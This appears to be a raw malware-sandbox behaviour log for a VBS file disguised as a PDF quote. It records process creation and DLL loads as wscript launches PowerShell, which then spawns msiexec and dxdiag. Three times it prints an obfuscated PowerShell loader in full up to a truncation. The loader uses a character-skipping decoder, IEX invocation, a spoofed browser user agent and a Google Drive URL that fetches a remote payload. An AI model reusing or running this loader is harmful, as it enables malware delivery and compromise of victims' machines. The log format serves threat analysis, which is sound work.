Source: dxdiag.exe, 00000014.00000003.2503662795.0000000021915000.00000004.00001000.00020000.00000000.sdmp

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Aj#U00e1nlatk#U00e9r#U00e9s 09-30-2024#U00b7pdf.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism Selekteringer #>;$Rystelses='Makeress';<#plungy Firdobling Preferrers Aftvingende Encoders Hardier Forsvarschefernes #>;$Hvsnings=$host.PrivateData;If ($Hvsnings) {$narrishkeit++;}function atomangreb($Antipapistical246){$Bondske=$Fremmeligst+$Antipapistical246.Length-$narrishkeit;for( $Halfheartednesses=5;$Halfheartednesses -lt $Bondske;$Halfheartednesses+=6){$minkfarven+=$Antipapistical246[$Halfheartednesses];}$minkfarven;}function rme($Stillehavsflaadernes){ . ($posthume) ($Stillehavsflaadernes);}$Gulvmaattens=atomangreb 'SpinaMb ugeoSade zSkyldiD.rivlTsarelPartea Hexi/ uror5Angin. Prod0A.tin Manom(skonnWmyoepibarsen MigodUnaudo SulfwSnv.es Lati Kons NBaan.TIniti Kldni1Regis0Bolig.Kirop0Opsam; Civi AntyW Pub iVir,lnWid.w6Rance4 igna;alene A,tabxReemk6Crabb4Speci;Handl IrettrAl,miv Budg:midda1Colpe2N dbr1Bombe. Hosl0Under)Ambit SubelGRenteeU eldcValthkMeethoHyper/In,ho2 Dune0 etnk1 List0 Medb0Nark 1Subef0Alder1 onr WicksFVaginiTwi.trB rguephanefSci,soEnga,xVandl/Gstel1 umsk2 Feri1Skaks.,inkl0 lge ';$librettoens=atomangreb ' alibU Tea,s CirceSui tRBegav- Geopa StorgInhomeIa.hinGarruTDisge ';$Broderierne=atomangreb 'DimplhAntietDistitGastepB,nussKrake:Ungdo/Funkt/Over.d B llr SelviAfd,ivR vieeAfkri.Drogsg RekloBidraoBe,vegIn.mulmarkseR,gnf.FigetcTuberoFamldm tang/.asteuBev.dcP eud?LammieWorkuxUdsk.pDunbaoTilm rRehant P lm=UnuandCaddioMaskiwkinemnVbnenlDelsao SnivaAtolldTegni&AlumriSm gsdBendi= Paal1 UriniIndtjs RecrL A acUDrapezM.dermSilenFdataiJLige 8Su co9 Dobbm knusOTo fl5ContofOrnam9IngenGLingul TomhoSko euZarisount,uL skdyyRefluVCanon7UdtmtqAdmetEMos itUnderw,avsprDividtFattiRTransuPalma ';$Udviskning=atomangreb 'stose>Nedfr ';$posthume=atomangreb 'BargiiMarkoE SkibX oso ';$Cassina='Kendetegner';$Dentine='\Smaalige.Eks';rme (atomangreb 'Rabat$Noncog Tap lNacroo enlsbE segapsychlStagn:AntisO oodvBo ene alkarForbecPsa ooGrundaM rcet Bire= Dy,t$ .ispeMedionvatikv orev:Tr chaPredapBarfop Scled FraiaMatert eskaaVigil+Bes,a$Dem eDB rmae AndrnSeawat oomsiSpi.nnProloeHa de ');rme (atomangreb ' Viva$PedotgDisselT rmkoSairlb PretaFlig.lClogg: KlasURemain Sregs uspet Hoveu agidSpa ei Op,eeReadodPerp.nSaddueAnke s,oextsKommu=Te,te$DriveB urmarT llgoKarnedBioloeVrlesrHeterinons e,athirOleosnInpute Succ.Illu.s Phy p Swi.lFusibiSerpetEkstr(A ous$Anti,UUnderdG udev,ndiui mprosUnshak OpmanOrga iTroopn J.ckgFarth)Staal ');rme (atomangreb ',arak[ KortNPneumeSo attSkovb.SkrmfSOverpeGarnerEnjoyvSlowmiBauxicU.eskeBrndePUndiso.ealiiFladfn Non tS,okiMPrvepaSquifnPortea GonogDemimeAfspnrOtten] Rip :fagbl: MainSF emmeKontrcBud ruLektir Knowi MldttTo nfyShantPver er KammoSymmet Vo doFl.decstratoStranlModpa Heter=Mini Brneb[drot N,erieeRaah t.umle.ForfrSFiloseMyretcStjfruUdlaarGar liBilbotSpilly tartPHock,rEpicloPapert S lioTagkacFrsteo Li,ilCoh,bT Yanoy aurepBeclaeTypec]Prize:Antnd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism Selekteringer #>;$Rystelses='Makeress';<#plungy Firdobling Preferrers Aftvingende Encoders Hardier Forsvarschefernes #>;$Hvsnings=$host.PrivateData;If ($Hvsnings) {$narrishkeit++;}function atomangreb($Antipapistical246){$Bondske=$Fremmeligst+$Antipapistical246.Length-$narrishkeit;for( $Halfheartednesses=5;$Halfheartednesses -lt $Bondske;$Halfheartednesses+=6){$minkfarven+=$Antipapistical246[$Halfheartednesses];}$minkfarven;}function rme($Stillehavsflaadernes){ . ($posthume) ($Stillehavsflaadernes);}$Gulvmaattens=atomangreb 'SpinaMb ugeoSade zSkyldiD.rivlTsarelPartea Hexi/ uror5Angin. Prod0A.tin Manom(skonnWmyoepibarsen MigodUnaudo SulfwSnv.es Lati Kons NBaan.TIniti Kldni1Regis0Bolig.Kirop0Opsam; Civi AntyW Pub iVir,lnWid.w6Rance4 igna;alene A,tabxReemk6Crabb4Speci;Handl IrettrAl,miv Budg:midda1Colpe2N dbr1Bombe. Hosl0Under)Ambit SubelGRenteeU eldcValthkMeethoHyper/In,ho2 Dune0 etnk1 List0 Medb0Nark 1Subef0Alder1 onr WicksFVaginiTwi.trB rguephanefSci,soEnga,xVandl/Gstel1 umsk2 Feri1Skaks.,inkl0 lge ';$librettoens=atomangreb ' alibU Tea,s CirceSui tRBegav- Geopa StorgInhomeIa.hinGarruTDisge ';$Broderierne=atomangreb 'DimplhAntietDistitGastepB,nussKrake:Ungdo/Funkt/Over.d B llr SelviAfd,ivR vieeAfkri.Drogsg RekloBidraoBe,vegIn.mulmarkseR,gnf.FigetcTuberoFamldm tang/.asteuBev.dcP eud?LammieWorkuxUdsk.pDunbaoTilm rRehant P lm=UnuandCaddioMaskiwkinemnVbnenlDelsao SnivaAtolldTegni&AlumriSm gsdBendi= Paal1 UriniIndtjs RecrL A acUDrapezM.dermSilenFdataiJLige 8Su co9 Dobbm knusOTo fl5ContofOrnam9IngenGLingul TomhoSko euZarisount,uL skdyyRefluVCanon7UdtmtqAdmetEMos itUnderw,avsprDividtFattiRTransuPalma ';$Udviskning=atomangreb 'stose>Nedfr ';$posthume=atomangreb 'BargiiMarkoE SkibX oso ';$Cassina='Kendetegner';$Dentine='\Smaalige.Eks';rme (atomangreb 'Rabat$Noncog Tap lNacroo enlsbE segapsychlStagn:AntisO oodvBo ene alkarForbecPsa ooGrundaM rcet Bire= Dy,t$ .ispeMedionvatikv orev:Tr chaPredapBarfop Scled FraiaMatert eskaaVigil+Bes,a$Dem eDB rmae AndrnSeawat oomsiSpi.nnProloeHa de ');rme (atomangreb ' Viva$PedotgDisselT rmkoSairlb PretaFlig.lClogg: KlasURemain Sregs uspet Hoveu agidSpa ei Op,eeReadodPerp.nSaddueAnke s,oextsKommu=Te,te$DriveB urmarT llgoKarnedBioloeVrlesrHeterinons e,athirOleosnInpute Succ.Illu.s Phy p Swi.lFusibiSerpetEkstr(A ous$Anti,UUnderdG udev,ndiui mprosUnshak OpmanOrga iTroopn J.ckgFarth)Staal ');rme (atomangreb ',arak[ KortNPneumeSo attSkovb.SkrmfSOverpeGarnerEnjoyvSlowmiBauxicU.eskeBrndePUndiso.ealiiFladfn Non tS,okiMPrvepaSquifnPortea GonogDemimeAfspnrOtten] Rip :fagbl: MainSF emmeKontrcBud ruLektir Knowi MldttTo nfyShantPver er KammoSymmet Vo doFl.decstratoStranlModpa Heter=Mini Brneb[drot N,erieeRaah t.umle.ForfrSFiloseMyretcStjfruUdlaarGar liBilbotSpilly tartPHock,rEpicloPapert S lioTagkacFrsteo Li,ilCoh,bT Yanoy aurepBeclaeTypec]Prize:Antnd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\syswow64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\syswow64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\syswow64\dxdiag.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism Selekteringer #>;$Rystelses='Makeress';<#plungy Firdobling Preferrers Aftvingende Encoders Hardier Forsvarschefernes #>;$Hvsnings=$host.PrivateData;If ($Hvsnings) {$narrishkeit++;}function atomangreb($Antipapistical246){$Bondske=$Fremmeligst+$Antipapistical246.Length-$narrishkeit;for( $Halfheartednesses=5;$Halfheartednesses -lt $Bondske;$Halfheartednesses+=6){$minkfarven+=$Antipapistical246[$Halfheartednesses];}$minkfarven;}function rme($Stillehavsflaadernes){ . ($posthume) ($Stillehavsflaadernes);}$Gulvmaattens=atomangreb 'SpinaMb ugeoSade zSkyldiD.rivlTsarelPartea Hexi/ uror5Angin. Prod0A.tin Manom(skonnWmyoepibarsen MigodUnaudo SulfwSnv.es Lati Kons NBaan.TIniti Kldni1Regis0Bolig.Kirop0Opsam; Civi AntyW Pub iVir,lnWid.w6Rance4 igna;alene A,tabxReemk6Crabb4Speci;Handl IrettrAl,miv Budg:midda1Colpe2N dbr1Bombe. Hosl0Under)Ambit SubelGRenteeU eldcValthkMeethoHyper/In,ho2 Dune0 etnk1 List0 Medb0Nark 1Subef0Alder1 onr WicksFVaginiTwi.trB rguephanefSci,soEnga,xVandl/Gstel1 umsk2 Feri1Skaks.,inkl0 lge ';$librettoens=atomangreb ' alibU Tea,s CirceSui tRBegav- Geopa StorgInhomeIa.hinGarruTDisge ';$Broderierne=atomangreb 'DimplhAntietDistitGastepB,nussKrake:Ungdo/Funkt/Over.d B llr SelviAfd,ivR vieeAfkri.Drogsg RekloBidraoBe,vegIn.mulmarkseR,gnf.FigetcTuberoFamldm tang/.asteuBev.dcP eud?LammieWorkuxUdsk.pDunbaoTilm rRehant P lm=UnuandCaddioMaskiwkinemnVbnenlDelsao SnivaAtolldTegni&AlumriSm gsdBendi= Paal1 UriniIndtjs RecrL A acUDrapezM.dermSilenFdataiJLige 8Su co9 Dobbm knusOTo fl5ContofOrnam9IngenGLingul TomhoSko euZarisount,uL skdyyRefluVCanon7UdtmtqAdmetEMos itUnderw,avsprDividtFattiRTransuPalma ';$Udviskning=atomangreb 'stose>Nedfr ';$posthume=atomangreb 'BargiiMarkoE SkibX oso ';$Cassina='Kendetegner';$Dentine='\Smaalige.Eks';rme (atomangreb 'Rabat$Noncog Tap lNacroo enlsbE segapsychlStagn:AntisO oodvBo ene alkarForbecPsa ooGrundaM rcet Bire= Dy,t$ .ispeMedionvatikv orev:Tr chaPredapBarfop Scled FraiaMatert eskaaVigil+Bes,a$Dem eDB rmae AndrnSeawat oomsiSpi.nnProloeHa de ');rme (atomangreb ' Viva$PedotgDisselT rmkoSairlb PretaFlig.lClogg: KlasURemain Sregs uspet Hoveu agidSpa ei Op,eeReadodPerp.nSaddueAnke s,oextsKommu=Te,te$DriveB urmarT llgoKarnedBioloeVrlesrHeterinons e,athirOleosnInpute Succ.Illu.s Phy p Swi.lFusibiSerpetEkstr(A ous$Anti,UUnderdG udev,ndiui mprosUnshak OpmanOrga iTroopn J.ckgFarth)Staal ');rme (atomangreb ',arak[ KortNPneumeSo attSkovb.SkrmfSOverpeGarnerEnjoyvSlowmiBauxicU.eskeBrndePUndiso.ealiiFladfn Non tS,okiMPrvepaSquifnPortea GonogDemimeAfspnrOtten] Rip :fagbl: MainSF emmeKontrcBud ruLektir Knowi MldttTo nfyShantPver er KammoSymmet Vo doFl.decstratoStranlModpa Heter=Mini Brneb[drot N,erieeRaah t.umle.ForfrSFiloseMyretcStjfruUdlaarGar liBilbotSpilly tartPHock,rEpicloPapert S lioTagkacFrsteo Li,ilCoh,bT Yanoy aurepBeclaeTypec]Prize:Antnd	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\syswow64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\syswow64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\syswow64\dxdiag.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
